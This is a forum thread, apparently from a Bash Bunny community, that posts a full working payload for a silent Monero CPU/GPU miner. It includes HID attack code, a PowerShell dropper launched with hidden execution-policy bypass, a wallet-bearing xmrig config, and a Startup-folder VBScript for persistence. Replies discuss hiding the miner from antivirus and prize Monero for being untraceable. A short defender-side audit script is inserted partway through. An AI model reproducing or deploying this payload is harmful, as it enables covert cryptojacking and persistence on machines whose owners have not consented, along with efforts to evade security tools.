
[PAYLOAD] Silent CPU/GPU miner with persistence


icarus255


My first payload for the BB ?

I just wanted to start off by saying that I don’t have a background in IT, I’m just an enthusiast. I did this really just to get more familiar with scripting and security, so I welcome any comments/criticisms.

I should note that Ar1k88 posted mining payloads sometime ago so creds to him for the original idea.

I ended up writing my own scripts rather than editing his ones and made some improvements e.g. combining the CPU and GPU miners into one payload, adding persistence, silent mode, etc.

Some notes below if you care:

Silent Mode

You can set the miners to run in the background by editing the startup.vbs script and changing “1” to “0” on lines 3 & 4, or by changing line 11 of the .json config file from “false” to “true”.

The CPU usage is also editable in the config file so you can set it to a lower value and avoid visibly slowing down the host’s performance (at the expense of the hash rate).

Once you execute the GPU miner, the computer will become almost non-responsive so definitely noticeable.

Persistence

I liked the idea of a VB script that runs on every startup which then subsequently initiates the miners. Windows of course didn’t like the idea of running scripts (I don’t know if this is a default security setting) but adding the vbs file as an exception to the execution policy seems to have fixed that (reference line 16 of run.ps1).

Instructions

You will need to download the xmrig binaries (or compile from source). Your browser and/or AV will most likely try to block the downloads. Windows Defender doesn't seem to mind though.

https://github.com/xmrig/xmrig/releases

https://github.com/xmrig/xmrig-nvidia

(sorry I forgot to add AMD support but it’s getting late and I have work tomorrow)

Copy the downloaded exe files (xmrig.exe and xmrig-nvidia.exe) and the following files into the switch 2 folder on the BB:

payload.txt

# Title:         Silent Monero Miner (with persistence)
# Description:   Monero CPU miner (https://github.com/xmrig), copies the miner and config files to local disk, and adds a script to startup
# Author:        icarus255
# Props:         0dyss3us (KeenanV) - I like his idea of adding the VB script to startup
# Version:       1.0
# Category:      Mining
# Target:        Windows 10
# Attackmodes:   HID, Storage
# Comments:      You will need to download the binaries from (https://github.com/xmrig/) or compile from source
# Silent mode:   You can start in silent mode (background) by changing config.json line 16: "background": false, -> "background": true,

#Setup
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION

#Wait for drive recognition
Q delay 4500

#Run the PowerShell script that starts the miners, copies the files to local disk, and adds the startup script.
LED ATTACK
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
LED FINISH

run.ps1

$Drive = (Get-WMIObject Win32_Volume | ? { $_.Label -eq 'BashBunny' }).name
$user= $env:UserName
$cpuminer = $Drive + "payloads\switch2\xmrig.exe"
$configfile = $Drive + "payloads\switch2\config.json"
$startupscript = $Drive + "payloads\switch2\startup.vbs"
$nvidiaminer = $Drive + "payloads\switch2\xmrig-nvidia.exe"
$StartupFolder = ("C:\Users\" + $user + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup")
$LocalFolder = ("C:\MoneroTest")

Set-Location -Path $Drive + "payloads\switch2"
copy-item -Path $cpuminer -Destination (new-item -type directory $LocalFolder) -force -ea 0
copy-item $configfile -Destination $LocalFolder
copy-item $nvidiaminer -Deistnation $LocalFolder
copy-item $startupscript -Destination $StartupFolder

Unblock-File -Path $StartupFolder + "startup.vbs"
Set-Location -Path $StartupFolder
Start-Process cmd -ArgumentList "/c start startup.vbs"


config.json

{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "av": 0,
    "background": false,
    "colors": true,
    "cpu-affinity": null,
    "cpu-priority": null,
    "donate-level": 5,
    "huge-pages": true,
    "hw-aes": null,
    "log-file": null,
    "max-cpu-usage": 75,
    "pools": [
        {
            "url": "pool.minexmr.com:4444",
            "user": "424MefYkUWB16pj42Fcsu1DVeGyywsoeY96oQkLcokoKSU2WyywLNdRXj2ms7y2JQk7c4QpTtsxZsdspHbWiwzc91rbBCjL",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": false,
            "variant": 1
        }
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "threads": null,
    "user-agent": null,
    "watch": false
}


startup.vbs

Dim WshShell
Set WshShell = WScript.CreateObject("WScript.shell")
WshShell.Run "powershell.exe C:\MoneroTest\xmrig.exe", 1, False
WshShell.Run "powershell.exe C:\MoneroTest\xmrig-nvidia.exe", 1, False
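
A defender-side audit of the persistence mechanism described above (a launcher script dropped into the Startup folder), as an added example that is not part of the original payload or of the xmrig project; it assumes a Windows host with PowerShell 3 or later, only reads from disk, and changes nothing.

```powershell
# Added defender-side example; not part of the original payload or the xmrig project.
# Audits the per-user and all-users Startup folders for script launchers (the
# persistence mechanism the post uses) and reports what each one starts.
$startupDirs = @(
    [Environment]::GetFolderPath('Startup'),        # current user's Startup folder
    [Environment]::GetFolderPath('CommonStartup')   # all-users Startup folder
)
$scriptExt = '.vbs', '.vbe', '.js', '.jse', '.wsf', '.bat', '.cmd', '.ps1'

$findings = foreach ($dir in $startupDirs) {
    if (-not (Test-Path -LiteralPath $dir)) { continue }
    foreach ($file in Get-ChildItem -LiteralPath $dir -File) {
        $isScript = $scriptExt -contains $file.Extension.ToLower()
        $launches = @()
        if ($isScript) {
            # Pull out any absolute .exe path the script references (e.g. C:\MoneroTest\xmrig.exe)
            $text = Get-Content -LiteralPath $file.FullName -Raw -ErrorAction SilentlyContinue
            $launches = [regex]::Matches($text, '(?i)[a-z]:\\[^"''\s]+\.exe') |
                ForEach-Object { $_.Value } | Sort-Object -Unique
        }
        # Mark-of-the-Web stream; its absence proves nothing, since run.ps1 strips it with Unblock-File
        $motw = Get-Item -LiteralPath $file.FullName -Stream Zone.Identifier -ErrorAction SilentlyContinue
        [pscustomobject]@{
            File       = $file.FullName
            Modified   = $file.LastWriteTime
            IsScript   = $isScript
            Launches   = ($launches -join '; ')
            HasMotW    = [bool]$motw
            # Executables launched from outside Program Files / Windows deserve a closer look
            Suspicious = [bool]($launches | Where-Object { $_ -notmatch '(?i)^[a-z]:\\(Program Files|Windows)\\' })
        }
    }
}

$findings | Format-Table -AutoSize

# Follow-up: is any executable referenced by a suspicious launcher running right now?
$findings | Where-Object Suspicious | ForEach-Object { $_.Launches -split '; ' } | ForEach-Object {
    $name = [IO.Path]::GetFileNameWithoutExtension($_)
    Get-Process -Name $name -ErrorAction SilentlyContinue | Select-Object Name, Id, CPU, Path
}
```

Run it under the account you are inspecting, since the per-user Startup folder resolves per profile; a machine-wide sweep would repeat the per-user part for each profile under C:\Users.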



Hi Icarus!

Some time ago, while I was taking a look at Ar1k88's payload, I had the same idea!

I’m also just an IT enthusiast, with a completely unrelated job to this environment, but I find your payload very interesting. Congrats! I can’t wait to have some free time to check it out.
On 1/17/2019 at 1:42 PM, 9ShadesLeft said:

For those of us (me) who are new to this stuff.

What is a CPU / GPU miner? I would assume for something either for Zombifying a PC or Bitcoin mining?

Beyond that, I have no clue!

Thank you for dealing with my being naive!

Mining can refer to any sort of crypto mining but in this instance we are mining Monero. Monero is a good choice because it's impossible to trace (or so they say) and you can mine it with a CPU.

I wrote this for fun and when crypto mining was the cool thing to do. I would still like to figure out how to crypt the miner so the AV doesn't pick it up, but don't hold your breath for that one 😉


5 minutes ago, MrMyFriend said:

I was kind of busy in the last period, but I'm still looking forward to giving this a try at the end of this or next week. Making the miner AV undetectable will definitely be the next thing to do.

Yea that has always been an end goal for this little project but crypting miners is a big step from writing simple startup scripts. I looked into this a while back and I had some general ideas on how to approach it but not sure if my coding skills are up to the challenge.

Fuck it, you have inspired me. I'm just going to no-life this for a month or so. What's the worst that could happen? 🙂

On 2/18/2019 at 9:39 AM, icarus255 said:

Yea that has always been an end goal for this little project but crypting miners is a big step from writing simple startup scripts. I looked into this a while back and I had some general ideas on how to approach it but not sure if my coding skills are up to the challenge.

Fuck it, you have inspired me. I'm just going to no-life this for a month or so. What's the worst that could happen? 🙂

still waiting for it bro 😢
